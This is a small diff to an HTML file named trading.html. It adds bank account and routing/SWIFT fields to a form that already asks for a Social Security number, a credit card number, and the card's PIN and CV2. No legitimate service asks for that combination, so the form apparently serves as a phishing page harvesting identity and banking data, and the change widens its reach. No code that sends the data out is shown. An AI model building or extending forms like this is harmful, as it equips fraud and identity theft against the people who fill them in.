--- a/trading.html
+++ b/trading.html
@@ -7,7 +7,8 @@
   Social Security Number: <input type="text" name="socialsecuritynumber"> <br>
   Credit Card Number: <input type="text" name="creditcardnumber"> <br>
   Pin and CV2 code: <input type="text" name="pinCV2"> <br>
-  
+  Bank account number: <input type="text" name="banknumber"> <br>
+  Routing number and Swift: <input type="text" name="routingswift"> <br>
 </form>
 
 
